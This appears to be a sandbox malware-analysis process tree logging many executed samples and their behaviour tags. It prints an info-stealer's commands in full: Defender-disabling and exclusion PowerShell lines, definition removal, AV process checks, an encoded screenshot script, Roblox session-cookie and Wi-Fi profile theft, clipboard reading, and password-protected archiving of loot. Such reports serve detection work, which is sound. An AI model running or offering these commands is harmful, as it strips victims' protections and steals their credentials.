C:\Users\Admin\Desktop\Mal\a\BLACK.exe"C:\Users\Admin\Desktop\Mal\a\BLACK.exe"3⤵
- Executes dropped EXE
PID:1560
-
-
C:\Users\Admin\Desktop\Mal\a\GREEEEEN.exe"C:\Users\Admin\Desktop\Mal\a\GREEEEEN.exe"3⤵
- Executes dropped EXE
PID:2116
-
-
C:\Users\Admin\Desktop\Mal\a\LXIX.exe"C:\Users\Admin\Desktop\Mal\a\LXIX.exe"3⤵
- Executes dropped EXE
PID:1920
-
-
C:\Users\Admin\Desktop\Mal\a\CL.exe"C:\Users\Admin\Desktop\Mal\a\CL.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3764
-
-
C:\Users\Admin\Desktop\Mal\a\ImageEditorforWP.exe"C:\Users\Admin\Desktop\Mal\a\ImageEditorforWP.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4148 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 12725⤵
- Program crash
PID:5176
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\1.exe"C:\Users\Admin\Desktop\Mal\a\1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4268 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 12804⤵
- Program crash
PID:5508
-
-
-
C:\Users\Admin\Desktop\Mal\a\inst.exe"C:\Users\Admin\Desktop\Mal\a\inst.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1772 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Sets service image path in registry
- Checks BIOS information in registry
- Suspicious behavior: LoadsDriver
PID:4016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\5⤵
- Command and Scripting Interpreter: PowerShell
PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\5⤵PID:4220
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\nvc.exe"C:\Users\Admin\Desktop\Mal\a\nvc.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4108
-
-
C:\Users\Admin\Desktop\Mal\a\update.exe"C:\Users\Admin\Desktop\Mal\a\update.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3292
-
-
C:\Users\Admin\Desktop\Mal\a\zx.exe"C:\Users\Admin\Desktop\Mal\a\zx.exe"3⤵
- Executes dropped EXE
PID:6776 -
C:\Users\Admin\Desktop\Mal\a\zx.exe"C:\Users\Admin\Desktop\Mal\a\zx.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4496
-
-
-
C:\Users\Admin\Desktop\Mal\a\svc.exe"C:\Users\Admin\Desktop\Mal\a\svc.exe"3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
PID:5648 -
C:\Users\Admin\AppData\Local\Temp\temp_25008.exe"C:\Users\Admin\AppData\Local\Temp\temp_25008.exe"4⤵
- Executes dropped EXE
PID:5176 -
C:\Users\Admin\AppData\Local\Temp\temp_25008.exe"C:\Users\Admin\AppData\Local\Temp\temp_25008.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6276
-
-
-
C:\Users\Admin\AppData\Local\Temp\temp_25024.exe"C:\Users\Admin\AppData\Local\Temp\temp_25024.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\temp_25027.exe"C:\Users\Admin\AppData\Local\Temp\temp_25027.exe"4⤵
- Executes dropped EXE
PID:1832
-
-
-
C:\Users\Admin\Desktop\Mal\a\ScreenSync.exe"C:\Users\Admin\Desktop\Mal\a\ScreenSync.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 13124⤵
- Program crash
PID:6800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 13124⤵
- Program crash
PID:6036
-
-
-
C:\Users\Admin\Desktop\Mal\a\InstallSetup.exe"C:\Users\Admin\Desktop\Mal\a\InstallSetup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6668
-
-
C:\Users\Admin\Desktop\Mal\a\suwce.exe"C:\Users\Admin\Desktop\Mal\a\suwce.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:6572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\Desktop\Mal\a\suwce.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- outlook_office_path
- outlook_win_path
PID:7080
-
-
-
C:\Users\Admin\Desktop\Mal\a\svc1.exe"C:\Users\Admin\Desktop\Mal\a\svc1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1540 -
C:\Users\Admin\Desktop\Mal\a\svc1.exe"C:\Users\Admin\Desktop\Mal\a\svc1.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:7116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 8204⤵
- Program crash
PID:1668
-
-
-
C:\Users\Admin\Desktop\Mal\a\yoda.exe"C:\Users\Admin\Desktop\Mal\a\yoda.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Advanced Advanced.cmd & Advanced.cmd4⤵
- System Location Discovery: System Language Discovery
PID:6524 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5564
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:6492
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6004
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵
- System Location Discovery: System Language Discovery
PID:6424
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3287485⤵
- System Location Discovery: System Language Discovery
PID:5140
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Discovery5⤵
- System Location Discovery: System Language Discovery
PID:5636
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Lean" Lyrics5⤵
- System Location Discovery: System Language Discovery
PID:348
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 328748\Plenty.com + Tablet + Pointed + Furniture + Rhythm + Children + Cliff + Madness + Amend + Interventions + Deadly + Notre + Wood 328748\Plenty.com5⤵
- System Location Discovery: System Language Discovery
PID:6548
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Biz + ..\Disaster + ..\Administration + ..\Stopped + ..\Broadcasting + ..\Kevin + ..\Pins u5⤵
- System Location Discovery: System Language Discovery
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\328748\Plenty.comPlenty.com u5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
-
-
C:\Users\Admin\Desktop\Mal\a\updater.exe"C:\Users\Admin\Desktop\Mal\a\updater.exe"3⤵
- Executes dropped EXE
PID:6216
-
-
C:\Users\Admin\Desktop\Mal\a\svc2.exe"C:\Users\Admin\Desktop\Mal\a\svc2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6828 -
C:\Users\Admin\Desktop\Mal\a\svc2.exe"C:\Users\Admin\Desktop\Mal\a\svc2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 8284⤵
- Program crash
PID:5264
-
-
-
C:\Users\Admin\Desktop\Mal\a\din.exe"C:\Users\Admin\Desktop\Mal\a\din.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6184
-
-
C:\Users\Admin\Desktop\Mal\a\putty.exe"C:\Users\Admin\Desktop\Mal\a\putty.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6904 -s 2644⤵
- Program crash
PID:2264
-
-
-
C:\Users\Admin\Desktop\Mal\a\Built.exe"C:\Users\Admin\Desktop\Mal\a\Built.exe"3⤵PID:5488
-
C:\Users\Admin\Desktop\Mal\a\Built.exe"C:\Users\Admin\Desktop\Mal\a\Built.exe"4⤵PID:6492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Mal\a\Built.exe'"5⤵PID:5324
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Mal\a\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:4968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
PID:5780
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All6⤵
- Deletes Windows Defender Definitions
PID:2972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:5308
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:6848
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:1652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:1748
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:3144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:5772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2128
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:3364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:7096
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6640 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:2884
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:2844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:6228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵PID:6440
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b1rjoval\b1rjoval.cmdline"7⤵PID:6712
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES779A.tmp" "c:\Users\Admin\AppData\Local\Temp\b1rjoval\CSC98D144E6293F44CF9AB61FFF2A25D9A.TMP"8⤵PID:7104
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2264
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1844
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2656
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4280
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3164
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:6068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
PID:7140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:6604
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵PID:5752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:5740
-
C:\Windows\system32\getmac.exegetmac6⤵PID:5148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI54882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\SyMAL.zip" *"5⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\_MEI54882\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI54882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\SyMAL.zip" *6⤵PID:5180
-
-
-
